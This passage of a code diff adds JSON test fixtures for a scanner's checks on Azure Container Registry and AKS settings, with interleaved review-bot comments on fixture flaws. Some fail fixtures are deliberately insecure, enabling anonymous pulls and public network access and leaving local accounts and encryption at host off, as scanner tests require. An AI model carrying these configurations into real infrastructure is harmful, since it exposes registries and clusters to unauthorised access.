@@ -0,0 +1,37 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.1", + "resources": [ + { + "apiVersion": "2019-05-01", + "type": "Microsoft.ContainerRegistry/registries", + "name": "pass", + "location": "[resourceGroup().location]", + "sku": { + "name": "Standard" + }, + "properties": { + "adminUserEnabled": false, + "anonymousPullEnabled": true, + "dataEndpointEnabled": true, + "encryption": { + "keyVaultProperties": { + "identity": "someIdentity", + "keyIdentifier": "someKeyIdentifier" + }, + "status": "enabled" + }, + "networkRuleBypassOptions": "AzureServices", + "networkRuleSet": { + "defaultAction": "Deny", + "ipRules": [ + { + "action": "Allow", + "value": "127.0.0.1" + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail.json new file mode 100644 index 00000000000..f489195f39c --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "fail", + "location": "eastus", + "sku": { + "name": "Standard" + }, + "properties": { + "anonymousPullEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail2.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail2.json new file mode 100644 index 00000000000..74c8af184a0 --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail2.json 
@@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "fail2", + "location": "eastus", + "sku": { + "name": "Premium" + }, + "properties": { + "anonymousPullEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass.json new file mode 100644 index 00000000000..07f29b948a3 --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "pass", + "location": "eastus", + "sku": { + "name": [] + }, + "properties": { + "anonymousPullEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass2.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass2.json new file mode 100644 index 00000000000..f48095bb9de --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass2.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "pass2", + "location": "eastus", + "sku": { + "name": "Premium" + }, + "properties": { + "anonymousPullEnabled": false + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass3.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass3.json new file mode 100644 index 00000000000..a961d830bb4 --- /dev/null 
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass3.json @@ -0,0 +1,19 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "pass3", + "location": "eastus", + "sku": { + "name": "Premium" + }, + "properties": { + "zoneRedundancy": "Disabled" + + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass4.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass4.json new file mode 100644 index 00000000000..9e83eae9d55 --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass4.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "pass4", + "location": "eastus", + "sku": { + "name": "Standard" + }, + "properties": { + "zoneRedundancy": "Disabled" + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass5.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass5.json new file mode 100644 index 00000000000..61eef7b345e --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass5.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "pass5", + "location": "eastus", + "sku": { + "name": "Basic" + }, + "properties": { + "anonymousPullEnabled": true + } + } + ] +} 
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass6.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass6.json new file mode 100644 index 00000000000..5936f1d2642 --- /dev/null +++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass6.json @@ -0,0 +1,15 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2021-09-01", + "name": "pass6", + "location": "eastus", + "properties": { + "anonymousPullEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRContainerScanEnabled/fail.json b/tests/arm/checks/resource/example_ACRContainerScanEnabled/fail.json new file mode 100644 index 00000000000..da47aaf9839 --- /dev/null +++ b/tests/arm/checks/resource/example_ACRContainerScanEnabled/fail.json @@ -0,0 +1,37 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.1", + "resources": [ + { + "apiVersion": "2019-05-01", + "type": "Microsoft.ContainerRegistry/registries", + "name": "fail", + "location": "[resourceGroup().location]", + "sku": { + "name": "Basic" + }, + "properties": { + "adminUserEnabled": true, + "anonymousPullEnabled": true, + "dataEndpointEnabled": true, + "encryption": { + "keyVaultProperties": { + "identity": "someIdentity", + "keyIdentifier": "someKeyIdentifier" + }, + "status": "enabled" + }, + "networkRuleBypassOptions": "AzureServices", + "networkRuleSet": { + "defaultAction": "Deny", + "ipRules": [ + { + "action": "Allow", + "value": "127.0.0.1" + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACRContainerScanEnabled/pass.json b/tests/arm/checks/resource/example_ACRContainerScanEnabled/pass.json new file mode 100644 index 00000000000..5b0807eb75b --- /dev/null 
+++ b/tests/arm/checks/resource/example_ACRContainerScanEnabled/pass.json @@ -0,0 +1,37 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.1", + "resources": [ + { + "apiVersion": "2019-05-01", + "type": "Microsoft.ContainerRegistry/registries", + "name": "pass", + "location": "[resourceGroup().location]", + "sku": { + "name": "Standard" + }, + "properties": { + "adminUserEnabled": true, + "anonymousPullEnabled": true, + "dataEndpointEnabled": true, + "encryption": { + "keyVaultProperties": { + "identity": "someIdentity", + "keyIdentifier": "someKeyIdentifier" + }, + "status": "enabled" + }, + "networkRuleBypassOptions": "AzureServices", + "networkRuleSet": { + "defaultAction": "Deny", + "ipRules": [ + { + "action": "Allow", + "value": "127.0.0.1" + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACREnableImageQuarantine/fail.json b/tests/arm/checks/resource/example_ACREnableImageQuarantine/fail.json new file mode 100644 index 00000000000..25ca6078fd9 --- /dev/null +++ b/tests/arm/checks/resource/example_ACREnableImageQuarantine/fail.json 
@@ -0,0 +1,42 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.1", + "resources": [ + { + "apiVersion": "2019-05-01", + "type": "Microsoft.ContainerRegistry/registries", + "name": "fail", + "location": "[resourceGroup().location]", + "sku": { + "name": "Basic" + }, + "properties": { + "adminUserEnabled": true, + "anonymousPullEnabled": true, + "dataEndpointEnabled": true, + "encryption": { + "keyVaultProperties": { + "identity": "someIdentity", + "keyIdentifier": "someKeyIdentifier" + }, + "status": "enabled" + }, + "policies": { + "quarantinePolicy": { + "status": "disabled" + } + }, + "networkRuleBypassOptions": "AzureServices", + "networkRuleSet": { + "defaultAction": "Deny", + "ipRules": [ + { + "action": "Allow", + "value": "127.0.0.1" + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACREnableImageQuarantine/pass.json b/tests/arm/checks/resource/example_ACREnableImageQuarantine/pass.json new file mode 100644 index 00000000000..8eafaff4ad4 --- /dev/null +++ b/tests/arm/checks/resource/example_ACREnableImageQuarantine/pass.json 
@@ -0,0 +1,42 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.1", + "resources": [ + { + "apiVersion": "2019-05-01", + "type": "Microsoft.ContainerRegistry/registries", + "name": "pass", + "location": "[resourceGroup().location]", + "sku": { + "name": "Standard" + }, + "properties": { + "adminUserEnabled": true, + "anonymousPullEnabled": true, + "dataEndpointEnabled": true, + "encryption": { + "keyVaultProperties": { + "identity": "someIdentity", + "keyIdentifier": "someKeyIdentifier" + }, + "status": "enabled" + }, + "policies": { + "quarantinePolicy": { + "status": "enabled" + } + }, + "networkRuleBypassOptions": "AzureServices", + "networkRuleSet": { + "defaultAction": "Deny", + "ipRules": [ + { + "action": "Allow", + "value": "127.0.0.1" + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail1.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail1.json new file mode 100644 index 00000000000..8e2c9c7d2ea --- /dev/null +++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail1.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "comments": "Container registry for storing docker images", + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2020-11-01", + "name": "fail1", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('acrSku')]", + "tier": "[parameters('acrSku')]" + }, + "tags": { + "displayName": "Container Registry", + "container.registry": "[parameters('acrName')]" + }, + "properties": { + "adminUserEnabled": "[parameters('acrAdminUserEnabled')]", + "zoneRedundancy": + "Disabled" + } + } + ] +} 
diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail2.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail2.json new file mode 100644 index 00000000000..fd1181c7712 --- /dev/null +++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail2.json @@ -0,0 +1,25 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ContainerRegistry/registries/replications", + "apiVersion": "2020-11-01", + "name": "fail2", + "location": "[parameters('acrReplicaLocation')]", + "dependsOn": [ + "[resourceId('Microsoft.ContainerRegistry/registries/', parameters('acrName'))]" + ], + "properties": { + "zoneRedundancy": "Disabled" + } + } + ], + + "outputs": { + "acrLoginServer": { + "value": "[reference(resourceId('Microsoft.ContainerRegistry/registries',parameters('acrName')),'2019-12-01').loginServer]", + "type": "string" + } + } +} diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass.json new file mode 100644 index 00000000000..371c3b60e4e --- /dev/null +++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": + [{ + "comments": "Container registry for storing docker images", + "type": "Microsoft.ContainerRegistry/registries", + "apiVersion": "2020-11-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('acrSku')]", + "tier": "[parameters('acrSku')]" + }, + "tags": { + "displayName": "Container Registry", + "container.registry": "[parameters('acrName')]" + }, + "properties": { + "adminUserEnabled": "[parameters('acrAdminUserEnabled')]", + "zoneRedundancy": "Enabled" + } + }] + } \ No newline at end of file 
diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass2.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass2.json new file mode 100644 index 00000000000..48cb8ede926 --- /dev/null +++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass2.json @@ -0,0 +1,25 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [{ + "type": "Microsoft.ContainerRegistry/registries/replications", + "apiVersion": "2020-11-01", + "name": "pass2", + "location": "[parameters('acrReplicaLocation')]", + "dependsOn": [ + "[resourceId('Microsoft.ContainerRegistry/registries/', parameters('acrName'))]" + ], + "properties": { + "zoneRedundancy": "Enabled" + }, + + "outputs": { + "acrLoginServer": { + "value": "[reference(resourceId('Microsoft.ContainerRegistry/registries',parameters('acrName')),'2019-12-01').loginServer]", + "type": "string" + } + } +} + ] + } + diff --git a/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/fail.json b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/fail.json new file mode 100644 index 00000000000..7b9d2ce460f --- /dev/null +++ b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/fail.json 
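Review bot: In `example_ACREnableZoneRedundancy/pass2.json` the `outputs` object is nested inside the single resource entry instead of being a top-level template key as it is in `fail2.json`, so the fixture is valid JSON but not the shape of a real ARM template. The check presumably reads only `properties.zoneRedundancy`, so the fixture still passes, but any later template-schema validation of the test corpus would reject it; moving `outputs` out of the resource to sit beside `resources` keeps the fixture truthful.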
@@ -0,0 +1,39 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.1",
+ "resources": [
+ {
+ "apiVersion": "2019-05-01",
+ "type": "Microsoft.ContainerRegistry/registries",
+ "name": "fail",
+ "location": "[resourceGroup().location]",
+ "sku": {
+ "name": "Basic"
+ },
+ "properties": {
+ "adminUserEnabled": true,
+ "anonymousPullEnabled": true,
+ "dataEndpointEnabled": true,
+ "encryption": {
+ "keyVaultProperties": {
+ "identity": "someIdentity",
+ "keyIdentifier": "someKeyIdentifier"
+ },
+ "status": "enabled"
+ },
+ "networkRuleBypassOptions": "AzureServices",
+ "networkRuleSet": {
+ "defaultAction": "Deny",
+ "ipRules": [
+ {
+ "action": "Allow",
+ "value": "127.0.0.1"
+ }
+ ]
+ },
+ "publicNetworkAccess":"Enabled"
+ }
+
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/pass.json b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/pass.json
new file mode 100644
index 00000000000..a53b36290aa
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRPublicNetworkAccessDisabled/pass.json
@@ -0,0 +1,38 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.1",
+ "resources": [
+ {
+ "apiVersion": "2019-05-01",
+ "type": "Microsoft.ContainerRegistry/registries",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "sku": {
+ "name": "Standard"
+ },
+ "properties": {
+ "adminUserEnabled": true,
+ "anonymousPullEnabled": true,
+ "dataEndpointEnabled": true,
+ "encryption": {
+ "keyVaultProperties": {
+ "identity": "someIdentity",
+ "keyIdentifier": "someKeyIdentifier"
+ },
+ "status": "enabled"
+ },
+ "networkRuleBypassOptions": "AzureServices",
+ "networkRuleSet": {
+ "defaultAction": "Deny",
+ "ipRules": [
+ {
+ "action": "Allow",
+ "value": "127.0.0.1"
+ }
+ ]
+ },
+ "publicNetworkAccess": "Disabled"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail1.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail1.json
new file mode 100644
index 00000000000..f9e72350be3
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail1.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2024-03-02",
+ "name": "fail1",
+ "location": "East US",
+ "properties": {
+ "vmSize": "Standard_DS2_v2",
+ "count": 1,
+ "tags": {
+ "Enviroment": "Production"
+ },
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "enableEncryptionAtHost": false,
+ "vmSize": "Standard_E4ads_v5",
+ "osDiskType": "Ephemeral",
+ "availabilityZones": [1, 2, 3],
+ "type": "VirtualMachineScaleSets",
+ "maxCount": 6,
+ "minCount": 2,
+ "enableAutoScaling": true,
+ "orchestratorVersion": "[parameters('kubernetesVersion')]",
+ "vnetSubnetID": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}"
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail2.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail2.json
new file mode 100644
index 00000000000..710ac742049
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/fail2.json
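Review bot: The tag key `"Enviroment": "Production"` in fail1.json is misspelled; the sibling fixtures failA1, failA2 and passA in the following hunks all use `"Environment"`. It has no effect on the encryption-at-host check, but a fixture that is later reused for a tag-based check would silently not match, so the one-line change `"Environment": "Production"` keeps the set consistent.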
@@ -0,0 +1,31 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2024-03-02",
+ "name": "fail2",
+ "location": "East US",
+ "properties": {
+ "vmSize": "Standard_DS2_v2",
+ "count": 1,
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "vmSize": "Standard_E4ads_v5",
+ "osDiskType": "Ephemeral",
+ "availabilityZones": [1, 2, 3],
+ "onlyCriticalAddonsEnabled": true,
+ "type": "VirtualMachineScaleSets",
+ "vnetSubnetID": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}",
+ "enableAutoScaling": true,
+ "maxCount": 6,
+ "minCount": 2,
+ "orchestratorVersion": "[parameters('kubernetesVersion')]"
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA1.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA1.json
new file mode 100644
index 00000000000..bb4f2b596e4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA1.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters/agentPools",
+ "apiVersion": "2014-04-01",
+ "name": "failA1",
+ "properties": {
+ "count": 1,
+ "enableEncryptionAtHost": false,
+ "vmSize": "Standard_DS2_v2",
+ "tags": {
+ "Environment": "Production"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA2.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA2.json
new file mode 100644
index 00000000000..02fc4247af3
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/failA2.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters/agentPools",
+ "apiVersion": "2014-04-01",
+ "name": "failA2",
+ "properties": {
+ "nodeCount": 1,
+ "vmSize": "Standard_DS2_v2",
+ "tags": {
+ "Environment": "Production"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/pass.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/pass.json
new file mode 100644
index 00000000000..ae0e8bf76c5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/pass.json
@@ -0,0 +1,35 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2024-03-02",
+ "name": "pass",
+ "location": "East US",
+ "properties": {
+ "vmSize": "Standard_DS2_v2",
+ "nodeCount": 1,
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "enableEncryptionAtHost": true,
+ "vmSize": "Standard_E4ads_v5",
+ "osDiskType": "Ephemeral",
+ "availabilityZones": [
+ 1,
+ 2,
+ 3
+ ],
+ "onlyCriticalAddOns": true,
+ "type": "VirtualMachineScaleSets",
+ "maxCount": 6,
+ "minCount": 2,
+ "orchestratorVersion": "[parameters('kubernetesVersion')]",
+ "vnetSubnetID": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{vnetName}/subnets/{subnetName}"
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/passA.json b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/passA.json
new file mode 100644
index 00000000000..1b45a98cd2a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEncryptionAtHostEnabled/passA.json
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters/agentPools",
+ "apiVersion": "2014-04-01",
+ "name": "passA",
+ "properties": {
+ "count": 1,
+ "enableEncryptionAtHost": true,
+ "orchestratorVersion": "[parameters('kubernetesVersion')]",
+ "vmSize": "Standard_DS2_v2",
+ "tags": {
+ "Environment": "Production"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail.json b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail.json
new file mode 100644
index 00000000000..304e6eeb875
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail.json
@@ -0,0 +1,36 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2018-06-01",
+ "name": "fail",
+ "properties": {
+ "vmSize": "Standard_DS2_v2",
+ "count": 1,
+ "tags": {
+ "Environment": "Production"
+ },
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "enableEncryptionAtHost": true,
+ "vmSize": "Standard_E4ads_v5",
+ "availabilityZones": [
+ 1,
+ 2,
+ 3
+ ],
+ "type": "VirtualMachineScaleSets",
+ "vnetSubnetID": "",
+ "enableAutoScaling": true,
+ "maxCount": 6,
+ "minCount": 2,
+ "orchestratorVersion": ""
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail2.json b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail2.json
new file mode 100644
index 00000000000..a289fb2a7b4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/fail2.json
@@ -0,0 +1,38 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2018-06-01",
+ "name": "fail2",
+ "properties": {
+ "vmSize": "Standard_DS2_v2",
+ "count": 1,
+ "osDiskType": "Managed",
+ "tags": {
+ "Environment": "Production"
+ },
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "enableEncryptionAtHost": true,
+ "vmSize": "Standard_E4ads_v5",
+ "osDiskType": "Managed",
+ "availabilityZones": [
+ 1,
+ 2,
+ 3
+ ],
+ "type": "VirtualMachineScaleSets",
+ "vnetSubnetID": "",
+ "enableAutoScaling": true,
+ "maxCount": 6,
+ "minCount": 2,
+ "orchestratorVersion": ""
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSEphemeralOSDisks/pass.json b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/pass.json
new file mode 100644
index 00000000000..880fe74a757
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSEphemeralOSDisks/pass.json
@@ -0,0 +1,35 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2018-06-01",
+ "name": "pass",
+ "properties": {
+ "osDiskType": "Ephemeral",
+ "vmSize": "Standard_DS2_v2",
+ "count": 1,
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "osDiskType": "Ephemeral",
+ "enableEncryptionAtHost": true,
+ "vmSize": "Standard_E4ads_v5",
+ "availabilityZones": [
+ 1,
+ 2,
+ 3
+ ],
+ "type": "VirtualMachineScaleSets",
+ "vnetSubnetID": "",
+ "enableAutoScaling": true,
+ "maxCount": 6,
+ "minCount": 2,
+ "orchestratorVersion": ""
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
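Review bot: pass.json sets `"osDiskType": "Ephemeral"` twice, once directly under the cluster's `properties` and once inside the `agentPoolProfiles` entry, and fail2.json in the same physical line mirrors that with `"Managed"` in both places. As far as I know a managedClusters resource has no cluster-level `osDiskType`; the attribute belongs to the agent pool profile. Because the two locations always agree, these fixtures cannot tell whether the check reads `properties.osDiskType` or `properties.agentPoolProfiles[].osDiskType`, so a check that only looked at the cluster-level key would still pass. Dropping the cluster-level `"osDiskType"` line from both files (keeping the pool-level one) makes the fixtures exercise the real path; fail.json, which omits the key entirely, is fine as is.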
diff --git a/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail.json b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail.json
new file mode 100644
index 00000000000..3239389cd30
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail.json
@@ -0,0 +1,27 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2018-06-01",
+ "name": "fail",
+ "properties": {
+ "resourceType": "Microsoft.ContainerService/managedClusters",
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "count": 1,
+ "vmSize": "Standard_D2_v2"
+ }
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ }
+ },
+ "tags": {
+ "Environment": "Production"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail2.json b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail2.json
new file mode 100644
index 00000000000..d4abc0483ac
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/fail2.json
@@ -0,0 +1,28 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2018-06-01",
+ "name": "fail2",
+ "properties": {
+ "resourceType": "Microsoft.ContainerService/managedClusters",
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "count": 1,
+ "vmSize": "Standard_D2_v2"
+ }
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "disableLocalAccounts": false
+ },
+ "tags": {
+ "Environment": "Production"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSLocalAdminDisabled/pass.json b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/pass.json
new file mode 100644
index 00000000000..299d0fc3e80
